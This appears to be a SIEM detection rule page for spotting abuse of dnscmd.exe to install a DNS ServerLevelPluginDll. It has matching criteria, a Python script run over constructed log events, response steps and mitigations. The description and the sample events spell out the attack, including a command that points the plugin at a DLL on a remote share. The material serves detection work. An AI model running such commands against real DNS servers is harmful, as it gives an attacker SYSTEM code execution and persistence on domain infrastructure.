New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

Last updated on:

Rule name: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

Rule type: Standard

Log sources: Windows

MITRE ATT&CK tags: Defense Evasion: Modify Registry (T1112); Defense Evasion: Hijack Execution Flow - DLL Side-Loading (T1574.002); Persistence: Hijack Execution Flow - DLL Side-Loading (T1574.002); Privilege Escalation: Hijack Execution Flow - DLL Side-Loading (T1574.002)

Severity: Trouble

About the rule

Rule Type

Standard

Rule Description

dnscmd.exe is a legitimate Windows command-line utility for managing DNS servers, including advanced configuration operations. Running `dnscmd [<server>] /config /serverlevelplugindll <path>` writes the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, and the DNS Server service (dns.exe, which runs as LocalSystem) loads that DLL the next time it starts. An attacker with the rights to issue this command (typically membership in DnsAdmins or Domain Admins) can therefore point the value at a DLL they control and have it executed as SYSTEM on the DNS server, which is frequently a domain controller. The result is arbitrary code execution, persistence that survives service restarts, and a covert foothold for command and control.

Severity

Trouble

Rule journey

Attack chain scenario

Initial access → Privilege escalation → Abuse of dnscmd.exe (install ServerLevelPluginDll) → Impact

Impact

  • Defense evasion
  • Arbitrary code execution with system or service account rights
  • Lateral movement within network
  • Data exfiltration
  • Infrastructure compromise

Rule Requirement

Prerequisites

Use the Group Policy Management Console to audit process creation and process termination (Audit Process Creation under Advanced Audit Policy Configuration). Also enable "Include command line in process creation events" (Computer Configuration > Administrative Templates > System > Audit Process Creation); without it, event 4688 carries no command line and the criteria below have nothing to match.

Install Sysmon from Microsoft Sysinternals and download the Sysmon configuration file that includes process creation monitoring. Add network connection events to the configuration file to monitor all network activity.

Create a new registry key "Microsoft-Windows-Sysmon/Operational" in the directory "Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\" if not already created.

Criteria

Action1: actionname = "Process started" AND PROCESSNAME endswith "\dnscmd.exe" AND (COMMANDLINE contains "/config" AND COMMANDLINE contains "/serverlevelplugindll") select Action1.HOSTNAME,Action1.MESSAGE,Action1.COMMANDLINE,Action1.FILE_NAME,Action1.PROCESSNAME,Action1.USERNAME,Action1.PARENTPROCESSNAME
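To show what the criteria actually match, here is an added example (not code from the rule page or its vendor) that runs the same logic over a handful of constructed process-creation records and enriches each hit with the target server and DLL path, so an analyst can see at a glance whether the DLL is local or pulled from a UNC share. The field names follow the rule's select list; the hostnames, users, paths and events are invented for the example.

```python
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation records (not real logs). Field names mirror
# the fields the rule selects; values are invented for this example.
SAMPLE_EVENTS = [
    {"HOSTNAME": "DC01", "USERNAME": r"CORP\dnsadmin1",
     "PROCESSNAME": r"C:\Windows\System32\dnscmd.exe",
     "PARENTPROCESSNAME": r"C:\Windows\System32\cmd.exe",
     "COMMANDLINE": "dnscmd /info"},                       # benign query
    {"HOSTNAME": "DC01", "USERNAME": r"CORP\dnsadmin1",
     "PROCESSNAME": r"C:\Windows\System32\dnscmd.exe",
     "PARENTPROCESSNAME": r"C:\Windows\System32\cmd.exe",
     "COMMANDLINE": r"dnscmd.exe /config /serverlevelplugindll \\10.0.0.5\share\evil.dll"},
    {"HOSTNAME": "WS07", "USERNAME": r"CORP\jdoe",          # run remotely from a workstation
     "PROCESSNAME": r"C:\Windows\System32\dnscmd.exe",
     "PARENTPROCESSNAME": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "COMMANDLINE": r'dnscmd dc01.corp.local /Config /ServerLevelPluginDll "C:\Program Files\Acme\plugin.dll"'},
    {"HOSTNAME": "DC01", "USERNAME": r"CORP\dnsadmin1",     # same registry value, no dnscmd.exe
     "PROCESSNAME": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "PARENTPROCESSNAME": r"C:\Windows\explorer.exe",
     "COMMANDLINE": r"powershell.exe -c Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters ServerLevelPluginDll C:\x.dll"},
    {"HOSTNAME": "DC01", "USERNAME": r"CORP\dnsadmin1",
     "PROCESSNAME": r"C:\Windows\System32\dnscmd.exe",
     "PARENTPROCESSNAME": r"C:\Windows\System32\cmd.exe",
     "COMMANDLINE": "dnscmd /config /serverlevelplugindll"},  # switch with no path
]


@dataclass
class Alert:
    hostname: str
    username: str
    parent: str
    target_server: Optional[str]  # None when dnscmd addressed the local server
    dll_path: Optional[str]       # None when no path followed the switch
    remote_dll: bool              # True when the path is a UNC path (\\host\share\...)


def matches_rule(event: dict) -> bool:
    """The rule's criteria: image is dnscmd.exe and the command line carries both
    /config and /serverlevelplugindll. Comparison is case-insensitive because
    dnscmd switches are, so '/ServerLevelPluginDll' must not slip through."""
    proc = event.get("PROCESSNAME", "").lower()
    cmd = event.get("COMMANDLINE", "").lower()
    return proc.endswith("\\dnscmd.exe") and "/config" in cmd and "/serverlevelplugindll" in cmd


def _tokens(cmdline: str) -> List[str]:
    # posix=False keeps Windows backslashes literal and keeps a quoted path as one
    # token (quotes included), so strip the quotes afterwards.
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def enrich(event: dict) -> Alert:
    """Pull the pieces an analyst needs from
    dnscmd [<ServerName>] /config /serverlevelplugindll [<DllPath>]."""
    toks = _tokens(event["COMMANDLINE"])
    target = toks[1] if len(toks) > 1 and not toks[1].startswith("/") else None
    dll = None
    for i, tok in enumerate(toks):
        if tok.lower() == "/serverlevelplugindll" and i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            dll = toks[i + 1]
    return Alert(
        hostname=event["HOSTNAME"],
        username=event["USERNAME"],
        parent=event["PARENTPROCESSNAME"],
        target_server=target,
        dll_path=dll,
        remote_dll=dll is not None and dll.startswith("\\\\"),
    )


def run_rule(events: List[dict]) -> List[Alert]:
    """Apply the criteria to a batch of records and return enriched alerts."""
    return [enrich(e) for e in events if matches_rule(e)]


if __name__ == "__main__":
    for alert in run_rule(SAMPLE_EVENTS):
        print(alert)
```

Two things the run makes visible. The fourth record sets the same registry value through PowerShell without ever launching dnscmd.exe and is not matched, so this rule should be paired with registry-value monitoring (for instance Sysmon Event ID 13 on the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters). The third record shows that dnscmd accepts a server name, so HOSTNAME in an alert is where the command was typed, not necessarily the DNS server that was reconfigured; the target_server field is the one to pivot on.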

Detection

Execution Mode

realtime

Log Sources

Active Directory

MITRE ATT&CK

Defense Evasion: Modify Registry (T1112); Defense Evasion: Hijack Execution Flow - DLL Side-Loading (T1574.002); Persistence: Hijack Execution Flow - DLL Side-Loading (T1574.002); Privilege Escalation: Hijack Execution Flow - DLL Side-Loading (T1574.002)

Security Standards

Enabling this rule will help you meet the security standard's requirement listed below:

DE.CM-01: Networks and network services are monitored to find potentially adverse events.

When this rule is triggered, you’re notified of an attempt to install or update a DNS ServerLevelPluginDll using dnscmd.exe. This supports detailed review of DNS server configurations, detection of potentially malicious plugin installations, and timely response to unauthorized changes, enabling rapid investigation and containment of emerging threats to DNS infrastructure.

Author

Florian Roth (Nextron Systems)

Future actions

Known False Positives

This rule may trigger during legitimate operations by administrators deploying authorized DNS server plugins or conducting approved maintenance. Carefully review plugin sources, digital signatures, and change management records for authenticity and business justification.

Next Steps

When this rule is triggered, the following measures can be implemented:

  1. Identification: Determine whether the flagged event is a new incident or part of an existing one.
  2. Analysis: Analyze the impact and extent of the incident to understand the severity of the attack using the Incident Workbench. Record who ran dnscmd.exe, from which host, against which DNS server, and which DLL path was supplied.
  3. Response: Respond promptly by initiating an automated workflow to cut the host's network connections and terminate the malicious process. Then inspect the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters on the targeted DNS server and clear it if the change is unauthorized. The DLL is loaded only when the DNS Server service starts, so act before the next restart; if the service has already restarted since the change, treat the DLL as having executed as SYSTEM and restart the service again after clearing the value.
  4. Reconfiguration: Strengthen plugin and administration controls, review DnsAdmins membership, enforce digital signature validation for plugins, and update monitoring rules for more precise detection of similar events.

Mitigation

Mitigation ID - Mitigation Name: Mitigation description

M1024 - Restrict Registry Permissions: Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

M1013 - Application Developer Guidance: When possible, include hash values in manifest files to help prevent side-loading of malicious libraries. (Citation: FireEye DLL Side-Loading)

M1051 - Update Software: Update software regularly to include patches that fix DLL side-loading vulnerabilities.